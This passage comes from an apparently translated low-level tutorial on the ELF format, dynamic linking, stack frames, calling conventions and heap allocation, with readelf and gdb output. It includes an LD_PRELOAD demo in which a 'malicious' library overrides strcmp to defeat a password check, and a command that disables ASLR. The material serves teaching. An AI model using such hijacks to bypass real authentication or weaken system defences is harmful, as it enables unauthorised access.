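PF_X, PF_W, PF_R = 1, 2, 4               # permission bits in p_flags


def parse_phdr32(data: bytes) -> dict:
    """Decode one Elf32_Phdr entry."""
    return dict(zip(PHDR_FIELDS, PHDR32.unpack_from(data)))


def flags_to_str(p_flags: int) -> str:
    """Render p_flags in the three-column style readelf uses (R, W, E)."""
    return "".join(ch if p_flags & bit else " "
                   for ch, bit in (("R", PF_R), ("W", PF_W), ("E", PF_X)))


# Second LOAD segment from the listing: offset 0xef4, FileSiz 0x130, MemSiz 0x13c, RW
raw = PHDR32.pack(PT_LOAD, 0xEF4, 0x1EF4, 0x1EF4, 0x130, 0x13C, PF_R | PF_W, 0x1000)
seg = parse_phdr32(raw)
zero_fill = seg["p_memsz"] - seg["p_filesz"]
print(flags_to_str(seg["p_flags"]), zero_fill)
```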

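Sections

The section header table is an array of Elf32_Shdr structures, one per section, each describing that section. The e_shoff member of the ELF header gives the offset of the section header table within the file, e_shnum gives the number of section descriptors, and e_shentsize gives the size of each descriptor.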

typedef struct
{
  Elf32_Word    sh_name;        /* Section name (string tbl index) */
  Elf32_Word    sh_type;        /* Section type */
  Elf32_Word    sh_flags;       /* Section flags */
  Elf32_Addr    sh_addr;        /* Section virtual addr at execution */
  Elf32_Off sh_offset;      /* Section file offset */
  Elf32_Word    sh_size;        /* Section size in bytes */
  Elf32_Word    sh_link;        /* Link to another section */
  Elf32_Word    sh_info;        /* Additional section information */
  Elf32_Word    sh_addralign;       /* Section alignment */
  Elf32_Word    sh_entsize;     /* Entry size if section holds table */
} Elf32_Shdr;

typedef struct
{
  Elf64_Word    sh_name;        /* Section name (string tbl index) */
  Elf64_Word    sh_type;        /* Section type */
  Elf64_Xword   sh_flags;       /* Section flags */
  Elf64_Addr    sh_addr;        /* Section virtual addr at execution */
  Elf64_Off sh_offset;      /* Section file offset */
  Elf64_Xword   sh_size;        /* Section size in bytes */
  Elf64_Word    sh_link;        /* Link to another section */
  Elf64_Word    sh_info;        /* Additional section information */
  Elf64_Xword   sh_addralign;       /* Section alignment */
  Elf64_Xword   sh_entsize;     /* Entry size if section holds table */
} Elf64_Shdr;

Use the readelf command to view all the sections in the object file:

$ readelf -S elfDemo.o
There are 15 section headers, starting at offset 0x41c:

Section Headers:
  [Nr] Name              Type            Addr     Off    Size   ES Flg Lk Inf Al
  [ 0]                   NULL            00000000 000000 000000 00      0   0  0
  [ 1] .group            GROUP           00000000 000034 000008 04     12  16  4
  [ 2] .text             PROGBITS        00000000 00003c 000078 00  AX  0   0  1
  [ 3] .rel.text         REL             00000000 000338 000048 08   I 12   2  4
  [ 4] .data             PROGBITS        00000000 0000b4 000008 00  WA  0   0  4
  [ 5] .bss              NOBITS          00000000 0000bc 000004 00  WA  0   0  4
  [ 6] .rodata           PROGBITS        00000000 0000bc 000004 00   A  0   0  1
  [ 7] .text.__x86.get_p PROGBITS        00000000 0000c0 000004 00 AXG  0   0  1
  [ 8] .comment          PROGBITS        00000000 0000c4 000012 01  MS  0   0  1
  [ 9] .note.GNU-stack   PROGBITS        00000000 0000d6 000000 00      0   0  1
  [10] .eh_frame         PROGBITS        00000000 0000d8 00007c 00   A  0   0  4
  [11] .rel.eh_frame     REL             00000000 000380 000018 08   I 12  10  4
  [12] .symtab           SYMTAB          00000000 000154 000140 10     13  13  4
  [13] .strtab           STRTAB          00000000 000294 0000a2 00      0   0  1
  [14] .shstrtab         STRTAB          00000000 000398 000082 00      0   0  1
Key to Flags:
  W (write), A (alloc), X (execute), M (merge), S (strings), I (info),
  L (link order), O (extra OS processing required), G (group), T (TLS),
  C (compressed), x (unknown), o (OS specific), E (exclude),
  p (processor specific)

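Note that the first entry of the ELF section header table is reserved and has type NULL.

String table

String tables are stored as sections and contain null-terminated character sequences. Object files use these strings for symbol and section names; a string is referenced simply by its offset into the table. The first and last bytes of a string table are null characters, so that every string has a well-defined start and end. Usually the section named .strtab is the string table (String Table), and the one named .shstrtab is the section header string table (Section Header String Table).

Offset	+0	+1	+2	+3	+4	+5	+6	+7	+8	+9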
+0	\0	h	e	l	l	o	\0	w	o	r
+10	l	d	\0	h	e	l	l	o	w	o
+20	r	l	d	\0

Offset	String
0	(empty string)
1	hello
7	world
13	helloworld
18	world
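
The lookup rule (start at the offset, read up to the next null byte) can be sketched as follows. The byte string reproduces the example table above; `get_string` is a hypothetical helper name.

```python
def get_string(strtab: bytes, offset: int) -> str:
    """Return the null-terminated string that starts at `offset` in a string table."""
    end = strtab.index(b"\0", offset)
    return strtab[offset:end].decode("ascii")


# The 24-byte example table: \0 hello \0 world \0 helloworld \0
STRTAB = b"\0hello\0world\0helloworld\0"

for off in (0, 1, 7, 13, 18):
    print(off, repr(get_string(STRTAB, off)))
```

Offset 18 points into the middle of "helloworld", which is why one stored string can serve two names.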

You can read both tables with readelf:

$ readelf -x .strtab elfDemo.o

Hex dump of section '.strtab':
  0x00000000 00656c66 44656d6f 2e63006c 6f63616c .elfDemo.c.local
  0x00000010 5f737461 7469635f 696e6974 5f766172 _static_init_var
  0x00000020 2e323139 35006c6f 63616c5f 73746174 .2195.local_stat
  0x00000030 69635f75 6e696e69 745f7661 722e3231 ic_uninit_var.21
  0x00000040 39360067 6c6f6261 6c5f696e 69745f76 96.global_init_v
  0x00000050 61720067 6c6f6261 6c5f756e 696e6974 ar.global_uninit
  0x00000060 5f766172 0066756e 63005f5f 7838362e _var.func.__x86.
  0x00000070 6765745f 70635f74 68756e6b 2e617800 get_pc_thunk.ax.
  0x00000080 5f474c4f 42414c5f 4f464653 45545f54 _GLOBAL_OFFSET_T
  0x00000090 41424c45 5f007072 696e7466 006d6169 ABLE_.printf.mai
  0x000000a0 6e00

$ readelf -x .shstrtab elfDemo.o

Hex dump of section '.shstrtab':
  0x00000000 002e7379 6d746162 002e7374 72746162 ..symtab..strtab
  0x00000010 002e7368 73747274 6162002e 72656c2e ..shstrtab..rel.
  0x00000020 74657874 002e6461 7461002e 62737300 text..data..bss.
  0x00000030 2e726f64 61746100 2e746578 742e5f5f .rodata..text.__
  0x00000040 7838362e 6765745f 70635f74 68756e6b x86.get_pc_thunk
  0x00000050 2e617800 2e636f6d 6d656e74 002e6e6f .ax..comment..no
  0x00000060 74652e47 4e552d73 7461636b 002e7265 te.GNU-stack..re
  0x00000070 6c2e6568 5f667261 6d65002e 67726f75 l.eh_frame..grou
  0x00000080 7000

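Symbol table

An object file's symbol table holds the information needed to locate and relocate a program's symbolic definitions and references. A symbol table index is a subscript into this array. Index 0 designates the first entry in the table and also serves as the undefined symbol index.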

typedef struct
{
  Elf32_Word    st_name;        /* Symbol name (string tbl index) */
  Elf32_Addr    st_value;       /* Symbol value */
  Elf32_Word    st_size;        /* Symbol size */
  unsigned char st_info;        /* Symbol type and binding */
  unsigned char st_other;       /* Symbol visibility */
  Elf32_Section st_shndx;       /* Section index */
} Elf32_Sym;

typedef struct
{
  Elf64_Word    st_name;        /* Symbol name (string tbl index) */
  unsigned char st_info;        /* Symbol type and binding */
  unsigned char st_other;       /* Symbol visibility */
  Elf64_Section st_shndx;       /* Section index */
  Elf64_Addr    st_value;       /* Symbol value */
  Elf64_Xword   st_size;        /* Symbol size */
} Elf64_Sym;

View the symbol table:

$ readelf -s elfDemo.o

Symbol table '.symtab' contains 20 entries:
   Num:    Value  Size Type    Bind   Vis      Ndx Name
     0: 00000000     0 NOTYPE  LOCAL  DEFAULT  UND
     1: 00000000     0 FILE    LOCAL  DEFAULT  ABS elfDemo.c
     2: 00000000     0 SECTION LOCAL  DEFAULT    2
     3: 00000000     0 SECTION LOCAL  DEFAULT    4
     4: 00000000     0 SECTION LOCAL  DEFAULT    5
     5: 00000000     0 SECTION LOCAL  DEFAULT    6
     6: 00000004     4 OBJECT  LOCAL  DEFAULT    4 local_static_init_var.219
     7: 00000000     4 OBJECT  LOCAL  DEFAULT    5 local_static_uninit_var.2
     8: 00000000     0 SECTION LOCAL  DEFAULT    7
     9: 00000000     0 SECTION LOCAL  DEFAULT    9
    10: 00000000     0 SECTION LOCAL  DEFAULT   10
    11: 00000000     0 SECTION LOCAL  DEFAULT    8
    12: 00000000     0 SECTION LOCAL  DEFAULT    1
    13: 00000000     4 OBJECT  GLOBAL DEFAULT    4 global_init_var
    14: 00000004     4 OBJECT  GLOBAL DEFAULT  COM global_uninit_var
    15: 00000000    46 FUNC    GLOBAL DEFAULT    2 func
    16: 00000000     0 FUNC    GLOBAL HIDDEN     7 __x86.get_pc_thunk.ax
    17: 00000000     0 NOTYPE  GLOBAL DEFAULT  UND _GLOBAL_OFFSET_TABLE_
    18: 00000000     0 NOTYPE  GLOBAL DEFAULT  UND printf
    19: 0000002e    74 FUNC    GLOBAL DEFAULT    2 main
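
The Type and Bind columns both come from the single st_info byte: the binding is stored in the high four bits and the type in the low four bits. A minimal sketch of that split follows; the dictionaries list only the values that appear in the listing above (plus WEAK), and the helper names are illustrative.

```python
STB_NAMES = {0: "LOCAL", 1: "GLOBAL", 2: "WEAK"}
STT_NAMES = {0: "NOTYPE", 1: "OBJECT", 2: "FUNC", 3: "SECTION", 4: "FILE"}


def split_st_info(st_info: int):
    """Return (bind, type) names for an st_info byte."""
    return STB_NAMES.get(st_info >> 4, "?"), STT_NAMES.get(st_info & 0xF, "?")


def make_st_info(bind: int, sym_type: int) -> int:
    """Combine a binding and a type into one st_info byte."""
    return (bind << 4) | (sym_type & 0xF)


print(split_st_info(0x12))   # an entry such as main: global function
print(split_st_info(0x03))   # a local section symbol
```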

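Relocation

Relocation is the process of connecting symbolic references with symbolic definitions. Relocatable files must carry information that describes how to modify their section contents, thus allowing executable and shared object files to hold the right information for a process's program image.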

typedef struct
{
  Elf32_Addr    r_offset;       /* Address */
  Elf32_Word    r_info;         /* Relocation type and symbol index */
} Elf32_Rel;

typedef struct
{
  Elf64_Addr    r_offset;       /* Address */
  Elf64_Xword   r_info;         /* Relocation type and symbol index */
  Elf64_Sxword  r_addend;       /* Addend */
} Elf64_Rela;

View the relocation tables:

$ readelf -r elfDemo.o

Relocation section '.rel.text' at offset 0x338 contains 9 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
00000008  00001002 R_386_PC32        00000000   __x86.get_pc_thunk.ax
0000000d  0000110a R_386_GOTPC       00000000   _GLOBAL_OFFSET_TABLE_
00000019  00000509 R_386_GOTOFF      00000000   .rodata
00000021  00001204 R_386_PLT32       00000000   printf
00000040  00001002 R_386_PC32        00000000   __x86.get_pc_thunk.ax
00000045  0000110a R_386_GOTPC       00000000   _GLOBAL_OFFSET_TABLE_
00000052  00000d09 R_386_GOTOFF      00000000   global_init_var
0000005d  00000309 R_386_GOTOFF      00000000   .data
00000068  00000f02 R_386_PC32        00000000   func

Relocation section '.rel.eh_frame' at offset 0x380 contains 3 entries:
 Offset     Info    Type            Sym.Value  Sym. Name
00000020  00000202 R_386_PC32        00000000   .text
00000044  00000202 R_386_PC32        00000000   .text
00000070  00000802 R_386_PC32        00000000   .text.__x86.get_pc_thu
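
The Info column packs two things into r_info. For 32-bit ELF the symbol table index is the upper 24 bits and the relocation type is the low 8 bits. The sketch below decodes a few Info values from the listing above; the type table covers only the i386 types that appear there, and `split_r_info` is an illustrative name.

```python
R_386_NAMES = {2: "R_386_PC32", 4: "R_386_PLT32", 9: "R_386_GOTOFF", 10: "R_386_GOTPC"}


def split_r_info(r_info: int):
    """Return (symbol index, relocation type) for a 32-bit r_info value."""
    return r_info >> 8, r_info & 0xFF


for info in (0x00001002, 0x0000110A, 0x00000509, 0x00001204, 0x00000F02):
    sym, rel_type = split_r_info(info)
    print(f"{info:08x}: symbol #{sym}, {R_386_NAMES.get(rel_type, rel_type)}")
```

Symbol index 18 is printf and index 15 is func in the symbol table shown earlier, which matches the Sym. Name column.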

Dynamic linking

Environment variables related to dynamic linking

LD_PRELOAD

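The LD_PRELOAD environment variable names shared libraries to be loaded before all others when a program runs. This lets us choose among identically named functions in different shared libraries: by setting the variable we load another library between the main program and its own shared libraries, and can even override functions in the original libraries. This opens the door to hijacking program execution.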

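#include<stdio.h>
#include<string.h>
int main(void) {
    char passwd[] = "password";
    char str[128];

    /* Limit the read to the buffer size; str already decays to char * */
    if (scanf("%127s", str) != 1) {
        return 1;
    }
    if (!strcmp(passwd, str)) {
        printf("correct\n");
        return 0;
    }
    printf("invalid\n");
    return 1;
}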

Next we build a malicious shared library that overrides the strcmp() function, compile it as a shared library, and set the LD_PRELOAD environment variable:

$ cat hack.c
#include<stdio.h>
int strcmp(const char *s1, const char *s2) {
    printf("hacked\n");
    return 0;
}
$ gcc -shared -o hack.so hack.c
$ gcc ldpreload.c
$ ./a.out
asdf
invalid
$ LD_PRELOAD="./hack.so" ./a.out
asdf
hacked
correct

LD_SHOW_AUXV

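AUXV (the auxiliary vector) is information that the kernel passes to user space when it executes an ELF file; setting this environment variable displays it. For example: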

$ LD_SHOW_AUXV=1 ls
AT_SYSINFO_EHDR: 0x7fff41fbc000
AT_HWCAP:        bfebfbff
AT_PAGESZ:       4096
AT_CLKTCK:       100
AT_PHDR:         0x55f1f623e040
AT_PHENT:        56
AT_PHNUM:        9
AT_BASE:         0x7f277e1ec000
AT_FLAGS:        0x0
AT_ENTRY:        0x55f1f6243060
AT_UID:          1000
AT_EUID:         1000
AT_GID:          1000
AT_EGID:         1000
AT_SECURE:       0
AT_RANDOM:       0x7fff41effbb9
AT_EXECFN:       /usr/bin/ls
AT_PLATFORM:     x86_64
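
The auxiliary vector itself is an array of (type, value) pairs terminated by an AT_NULL entry. The following sketch parses such an array, assuming a 64-bit little-endian process (two 8-byte words per entry); the sample data is synthetic and only reuses three values from the output above, and `parse_auxv` is a name invented here.

```python
import struct

# A few a_type numbers as defined in <elf.h>
AT_NULL = 0
AT_NAMES = {3: "AT_PHDR", 4: "AT_PHENT", 5: "AT_PHNUM",
            6: "AT_PAGESZ", 7: "AT_BASE", 9: "AT_ENTRY"}
ENTRY64 = struct.Struct("<QQ")       # (a_type, a_val), assumption: 64-bit little-endian


def parse_auxv(raw: bytes) -> dict:
    """Decode auxiliary vector entries up to the terminating AT_NULL."""
    result = {}
    usable = len(raw) - len(raw) % ENTRY64.size   # ignore a trailing partial entry
    for a_type, a_val in ENTRY64.iter_unpack(raw[:usable]):
        if a_type == AT_NULL:
            break
        result[AT_NAMES.get(a_type, a_type)] = a_val
    return result


sample = b"".join(ENTRY64.pack(t, v) for t, v in [(6, 4096), (4, 56), (5, 9), (0, 0)])
auxv = parse_auxv(sample)
print(auxv)
```

On Linux the raw vector of the current process is typically available as /proc/self/auxv, so the same function could be tried on the bytes read from that file.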

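Memory management

What is memory

To give each user program a private address space and its own CPU at run time, as if it had the whole computer to itself, modern operating systems introduced the concept of virtual memory.

Virtual memory serves three main purposes:

- It treats main memory as a cache for an address space stored on disk, keeping only the active areas in memory and moving data between disk and memory as needed.
- It provides every process with a uniform address space.
- It protects the address space of each process from corruption by other processes.

Modern operating systems use virtual addressing: the CPU accesses memory by generating a virtual address (VA), which the memory management unit (MMU) translates into a physical address before it is sent to memory.

As we saw earlier, an executable file is mapped into memory. Linux maintains a separate virtual address space for every process, containing .text, .data, .bss, the stack, the heap, shared libraries, and so on.

A 32-bit system has a 4GB address space, of which 0x08048000~0xbfffffff is user space (3GB) and 0xc0000000~0xffffffff is kernel space (1GB).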

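Stack and calling conventions

Stack

The stack is a first-in, last-out (FILO) container. It holds function return addresses and arguments, temporary variables, and related context. When a program calls a function, compiler-generated code saves and restores the function's context through pushes and pops, with no manual intervention from the programmer.

The stack grows from high addresses toward low addresses. The bookkeeping information that a function call needs is kept on the stack in what is called a stack frame. On x86, the ebp register points to the bottom of the stack frame and esp points to its top. A push decreases the top-of-stack address and a pop increases it.

PUSH: pushes onto the stack. It subtracts 4 from esp, then writes its single operand to the memory address esp points to.
POP: pops from the stack. It reads the data at the memory address esp points to, loads it into the instruction's operand (usually a register), then adds 4 to esp.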

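On x86, a function call always proceeds like this:

1. Push all or some of the arguments onto the stack; any arguments not pushed are passed in specific registers.
2. Push the address of the instruction following the current one onto the stack.
3. Jump to the function body and execute it.

Steps 2 and 3 are performed together by the call instruction. Once control reaches the function body, the function starts executing, and an x86 function body begins like this:

push ebp: push ebp onto the stack (old ebp).
mov ebp, esp: ebp = esp (ebp now points to the top of the stack, which holds old ebp).
[optional] sub esp, XXX: allocate XXX bytes of temporary space on the stack.
[optional] push XXX: save the register named XXX.

ebp is pushed so that its previous value can be restored when the function returns, and registers are pushed so that certain registers keep the same values across the call. On return the operations mirror the entry sequence:

[optional] pop XXX: restore the saved registers.
mov esp, ebp: restore esp, which also reclaims the space of the local variables.
pop ebp: restore the saved value of ebp.
ret: take the return address from the stack and jump to it.

The assembly corresponding to a stack frame: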

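PUSH ebp        ; function entry (save the existing ebp value on the stack before using ebp)
MOV ebp, esp    ; save the current esp in ebp

...             ; function body
                ; however esp changes, ebp stays fixed, so locals and arguments can be accessed safely
MOV esp, ebp    ; restore esp to the value it had at function entry
POP ebp         ; pop the saved ebp value before returning
RET             ; return and jump to the return address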
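
The effect of the call, prologue, and epilogue sequence on esp and ebp can be traced with a toy model. This is a sketch under simplifying assumptions, not an emulator: memory is a dictionary keyed by address, every slot is 4 bytes, and the class name `Cpu32`, the start address, and the sample values are all made up for illustration.

```python
class Cpu32:
    """Toy model of esp/ebp and a downward-growing stack of 4-byte slots."""

    def __init__(self, esp=0xBFFFF000):
        self.esp = esp
        self.ebp = 0
        self.mem = {}

    def push(self, value):
        self.esp -= 4                  # PUSH: esp decreases first
        self.mem[self.esp] = value     # then the value is written at [esp]

    def pop(self):
        value = self.mem[self.esp]     # POP: read the value at [esp]
        self.esp += 4                  # then esp increases
        return value

    def prologue(self, local_bytes):
        self.push(self.ebp)            # push ebp
        self.ebp = self.esp            # mov ebp, esp
        self.esp -= local_bytes        # sub esp, XXX

    def epilogue(self):
        self.esp = self.ebp            # mov esp, ebp
        self.ebp = self.pop()          # pop ebp
        return self.pop()              # ret: pop the return address


cpu = Cpu32()
cpu.ebp = 0x1234                       # caller's frame pointer (arbitrary sample value)
esp_before_call = cpu.esp
cpu.push(2)                            # arguments are pushed right to left
cpu.push(1)
cpu.push(0x599)                        # call: push the return address
cpu.prologue(0x10)
first_arg = cpu.mem[cpu.ebp + 8]       # [ebp+4] is the return address
second_arg = cpu.mem[cpu.ebp + 12]
return_to = cpu.epilogue()
cpu.esp += 8                           # the caller removes its two arguments
print(first_arg, second_arg, hex(return_to), hex(cpu.ebp))
```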

The standard stack layout after a function call is shown in the figure below:

Let's look at an example. Source code:

#include<stdio.h>
int add(int a, int b) {
    int x = a, y = b;
    return (x + y);
}

int main() {
    int a = 1, b = 2;
    printf("%d\n", add(a, b));
    return 0;
}

Use gdb to view the corresponding assembly; detailed comments are included here:

gdb-peda$ disassemble main
Dump of assembler code for function main:
   0x00000563 <+0>: lea    ecx,[esp+0x4]                      ;load the address esp+0x4 into ecx
   0x00000567 <+4>: and    esp,0xfffffff0                     ;align the stack to 16 bytes
   0x0000056a <+7>: push   DWORD PTR [ecx-0x4]                ;push the dword at ecx-0x4, i.e. at the original esp (the return address of main())
   0x0000056d <+10>:    push   ebp                              ;save the ebp from before main(); _start cleared ebp, so ebp=0x0 here
   0x0000056e <+11>:    mov    ebp,esp                          ;make the current esp the ebp of this stack frame
   0x00000570 <+13>:    push   ebx                              ;push ebx and ecx
   0x00000571 <+14>:    push   ecx
   0x00000572 <+15>:    sub    esp,0x10                         ;allocate space for locals a and b, keeping 16-byte alignment
   0x00000575 <+18>:    call   0x440 <__x86.get_pc_thunk.bx>    ;call <__x86.get_pc_thunk.bx>, which loads the return address at [esp] (0x57a) into ebx
   0x0000057a <+23>:    add    ebx,0x1a86                       ;ebx+0x1a86
   0x00000580 <+29>:    mov    DWORD PTR [ebp-0x10],0x1         ;a is stored at ebp-0x10; this is a=1
   0x00000587 <+36>:    mov    DWORD PTR [ebp-0xc],0x2          ;b is stored at ebp-0xc; this is b=2
   0x0000058e <+43>:    push   DWORD PTR [ebp-0xc]              ;push b
   0x00000591 <+46>:    push   DWORD PTR [ebp-0x10]             ;push a
   0x00000594 <+49>:    call   0x53d <add>                      ;call add(); the return value is left in eax
   0x00000599 <+54>:    add    esp,0x8                          ;clean up the arguments of add()
   0x0000059c <+57>:    sub    esp,0x8                          ;adjust esp for 16-byte alignment
   0x0000059f <+60>:    push   eax                              ;push eax (the result of add())
   0x000005a0 <+61>:    lea    eax,[ebx-0x19b0]                 ;load the address ebx-0x19b0 into eax; the string "%d\n" is stored there
   0x000005a6 <+67>:    push   eax                              ;push eax
   0x000005a7 <+68>:    call   0x3d0 <printf@plt>               ;call printf()
   0x000005ac <+73>:    add    esp,0x10                         ;adjust esp to clean up the arguments of printf()
   0x000005af <+76>:    mov    eax,0x0                          ;eax=0x0
   0x000005b4 <+81>:    lea    esp,[ebp-0x8]                    ;load the address ebp-0x8 into esp
   0x000005b7 <+84>:    pop    ecx                              ;pop to restore ecx, ebx, ebp
   0x000005b8 <+85>:    pop    ebx
   0x000005b9 <+86>:    pop    ebp
   0x000005ba <+87>:    lea    esp,[ecx-0x4]                    ;load the address ecx-0x4 into esp
   0x000005bd <+90>:    ret                                     ;return, equivalent to pop eip
End of assembler dump.
gdb-peda$ disassemble add
Dump of assembler code for function add:
   0x0000053d <+0>: push   ebp                                ;save the ebp from before add()
   0x0000053e <+1>: mov    ebp,esp                            ;make the current esp the ebp of this stack frame
   0x00000540 <+3>: sub    esp,0x10                           ;allocate space for locals x and y, keeping 16-byte alignment
   0x00000543 <+6>: call   0x5be <__x86.get_pc_thunk.ax>      ;call <__x86.get_pc_thunk.ax>, which loads the return address at [esp] (0x548) into eax
   0x00000548 <+11>:    add    eax,0x1ab8                       ;eax+0x1ab8
   0x0000054d <+16>:    mov    eax,DWORD PTR [ebp+0x8]          ;load the value 0x1 at ebp+0x8 into eax; ebp+0x4 holds the return address
   0x00000550 <+19>:    mov    DWORD PTR [ebp-0x8],eax          ;store the value 0x1 in eax at ebp-0x8
   0x00000553 <+22>:    mov    eax,DWORD PTR [ebp+0xc]          ;load the value 0x2 at ebp+0xc into eax
   0x00000556 <+25>:    mov    DWORD PTR [ebp-0x4],eax          ;store the value 0x2 in eax at ebp-0x4
   0x00000559 <+28>:    mov    edx,DWORD PTR [ebp-0x8]          ;load the value 0x1 at ebp-0x8 into edx
   0x0000055c <+31>:    mov    eax,DWORD PTR [ebp-0x4]          ;load the value 0x2 at ebp-0x4 into eax
   0x0000055f <+34>:    add    eax,edx                          ;eax+edx
   0x00000561 <+36>:    leave                                   ;tear down the frame, equivalent to mov esp,ebp; pop ebp
   0x00000562 <+37>:    ret
End of assembler dump.

We are on Linux here, where the entry point of an ELF file is actually _start rather than main(), so we should also look at the following function:

gdb-peda$ disassemble _start
Dump of assembler code for function _start:
   0x00000400 <+0>: xor    ebp,ebp                            ;clear ebp, so the previous ebp saved in main()'s stack frame is 0x00000000
   0x00000402 <+2>: pop    esi                                ;pop argc into esi
   0x00000403 <+3>: mov    ecx,esp                            ;pass the top-of-stack address (the start of the argv and env arrays) to ecx
   0x00000405 <+5>: and    esp,0xfffffff0                     ;align the stack to 16 bytes
   0x00000408 <+8>: push   eax                                ;push eax, esp, edx
   0x00000409 <+9>: push   esp
   0x0000040a <+10>:    push   edx
   0x0000040b <+11>:    call   0x432 <_start+50>                ;push the address of the next instruction, 0x00000410, then jump to the code at 0x00000432
   0x00000410 <+16>:    add    ebx,0x1bf0                       ;ebx+0x1bf0
   0x00000416 <+22>:    lea    eax,[ebx-0x19d0]                 ;load the address of <__libc_csu_fini> into eax, then push it
   0x0000041c <+28>:    push   eax
   0x0000041d <+29>:    lea    eax,[ebx-0x1a30]                 ;load the address of <__libc_csu_init> into eax, then push it
   0x00000423 <+35>:    push   eax
   0x00000424 <+36>:    push   ecx                              ;push ecx and esi
   0x00000425 <+37>:    push   esi
   0x00000426 <+38>:    push   DWORD PTR [ebx-0x8]              ;push the entry address of main(), which is passed to __libc_start_main
   0x0000042c <+44>:    call   0x3e0 <__libc_start_main@plt>    ;call __libc_start_main
   0x00000431 <+49>:    hlt                                     ;hlt halts the processor: it stops executing instructions and does not affect the flags. The CPU leaves the halt state on a RESET signal, a non-maskable interrupt, or a maskable interrupt, and then executes the next instruction
   0x00000432 <+50>:    mov    ebx,DWORD PTR [esp]              ;load the dword at [esp] (the return address 0x00000410) into ebx
   0x00000435 <+53>:    ret                                     ;return, equivalent to pop eip
   0x00000436 <+54>:    xchg   ax,ax                            ;exchange ax with ax, equivalent to nop
   0x00000438 <+56>:    xchg   ax,ax
   0x0000043a <+58>:    xchg   ax,ax
   0x0000043c <+60>:    xchg   ax,ax
   0x0000043e <+62>:    xchg   ax,ax
End of assembler dump.

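Function Calling Conventions

A calling convention is an agreement on how arguments are passed when a function is called. Before the call, the caller pushes the arguments onto the stack, where the callee can read them.

A calling convention typically covers the following:

The order and method of passing function arguments
How the stack is maintained
The name decoration scheme

The main calling conventions are listed below; cdecl is the default calling convention for C: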

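Calling convention	Stack cleanup by	Argument passing	Name decoration
cdecl	Caller	Arguments pushed onto the stack from right to left	Underscore + function name
stdcall	Callee	Arguments pushed onto the stack from right to left	Underscore + function name + @ + size of arguments in bytes
fastcall	Callee	The first two arguments that are DWORD (4 bytes) or smaller go in registers; the remaining arguments are pushed onto the stack from right to left	@ + function name + @ + size of arguments in bytes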
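The name decoration column of the table can be sketched in a few lines of Python. This is only an illustration of the naming rules listed above; the helper `decorate` and the sample function `add` are hypothetical and not part of any toolchain.

```python
def decorate(name, convention, arg_bytes=0):
    """Return the decorated symbol name for a 32-bit C function,
    following the rules in the table above."""
    if convention == "cdecl":
        return "_" + name
    if convention == "stdcall":
        return "_{}@{}".format(name, arg_bytes)
    if convention == "fastcall":
        return "@{}@{}".format(name, arg_bytes)
    raise ValueError("unknown calling convention: " + convention)


# A hypothetical int add(int a, int b) takes 8 bytes of arguments.
for conv in ("cdecl", "stdcall", "fastcall"):
    print(conv, decorate("add", conv, 8))
```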

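Besides passing arguments, a function and its caller can also interact through the return value. A return value of at most 4 bytes is stored in the eax register. A return value of 5 to 8 bytes is returned in eax and edx together, with eax holding the low 4 bytes and edx the high 4 bytes.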
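As a small worked example of the edx:eax rule, the sketch below splits a 64-bit value into the two 32-bit halves a caller would find in the registers. The function name `split_return_value` is made up for illustration.

```python
def split_return_value(value):
    """Split a 64-bit return value into its (eax, edx) halves."""
    value &= 0xFFFFFFFFFFFFFFFF      # keep 64 bits
    eax = value & 0xFFFFFFFF         # low 4 bytes
    edx = value >> 32                # high 4 bytes
    return eax, edx


eax, edx = split_return_value(0x1122334455667788)
print(hex(eax), hex(edx))
```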

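Heap and Memory Management

Heap

The heap is the memory region that holds everything that does not live on the stack, and it is maintained by a dynamic memory allocator. The allocator treats the heap as a collection of blocks of various sizes, where each block is a contiguous chunk of virtual memory. Calling malloc() and free() operates on heap memory. Because releasing heap memory is the programmer's responsibility, memory leaks are easy to introduce.

The heap grows toward higher addresses and is not necessarily one contiguous region. This is because the system tracks free memory in a linked list, which is traversed from low addresses to high addresses. The size of the heap is limited by the virtual memory available in the system, so the heap is flexible and can be quite large.

If every allocation went straight to a system call, program performance would suffer badly. Usually the runtime library first obtains a large piece of heap space from the operating system "wholesale" and then "retails" it to the program. When it is sold out, or what remains cannot satisfy a request, the library "restocks" from the operating system as needed.

Process Heap Management

Linux provides two ways to allocate heap space: the brk() system call and the mmap() system call. See man brk and man mmap for details.

brk() is declared as follows: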

#include <unistd.h>

int brk(void *addr);

void *sbrk(intptr_t increment);

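The addr argument is the end address of the process's data segment (the program break). brk() resizes the data segment by changing this address: moving it toward higher addresses enlarges the process's memory, and moving it toward lower addresses shrinks it. brk() returns 0 on success and -1 on failure. sbrk() is similar, but its increment argument is a delta, that is, the amount of space to add or remove. On success it returns the end address of the data segment as it was before the change; on failure it returns (void *)-1.

In the figure above, brk marks the end of the heap and start_brk marks its start. Between the BSS segment and the heap lies a Random brk offset, which is caused by ASLR. With ASLR disabled, the Random brk offset is 0 and the start of the heap coincides with the end of the data segment.

Example source: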

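#include <stdio.h>
#include <unistd.h>

int main(void) {
        void *curr_brk, *tmp_brk, *pre_brk;

        printf("Current PID: %d\n", getpid());

        /* sbrk(0) returns the current program break without moving it */
        tmp_brk = curr_brk = sbrk(0);
        printf("Initial program break: %p\n", curr_brk);
        getchar();

        /* cast to char * because arithmetic on void * is a GNU extension */
        brk((char *)curr_brk + 4096);
        curr_brk = sbrk(0);
        printf("Program break after brk: %p\n", curr_brk);
        getchar();

        pre_brk = sbrk(4096);
        curr_brk = sbrk(0);
        printf("sbrk return value (previous program break): %p\n", pre_brk);
        printf("Program break after sbrk: %p\n", curr_brk);
        getchar();

        /* restore the original program break */
        brk(tmp_brk);
        curr_brk = sbrk(0);
        printf("Program break restored to its initial value: %p\n", curr_brk);
        getchar();
        return 0;
}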

Open two terminals, one to run the program and one to inspect memory addresses. First we look at the case with ASLR disabled. Step 1, initialization:

# echo 0 > /proc/sys/kernel/randomize_va_space
$ ./a.out
Current PID: 27759
Initial program break: 0x56579000
# cat /proc/27759/maps
...
56557000-56558000 rw-p 00001000 08:01 28587506                           /home/a.out
56558000-56579000 rw-p 00000000 00:00 0                                  [heap]
...

The end of the data segment and the start of the heap are both 0x56558000, and the heap ends at 0x56579000.
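Reading these ranges by eye is error-prone, so here is a minimal Python sketch that parses lines in the /proc/PID/maps format and computes the heap size. The sample lines are copied from the output above; the helper `parse_maps_line` is hypothetical.

```python
def parse_maps_line(line):
    """Parse one /proc/<pid>/maps line into (start, end, perms, name)."""
    fields = line.split()
    start_s, end_s = fields[0].split("-")
    name = fields[5] if len(fields) > 5 else ""
    return int(start_s, 16), int(end_s, 16), fields[1], name


sample = """\
56557000-56558000 rw-p 00001000 08:01 28587506                           /home/a.out
56558000-56579000 rw-p 00000000 00:00 0                                  [heap]
"""

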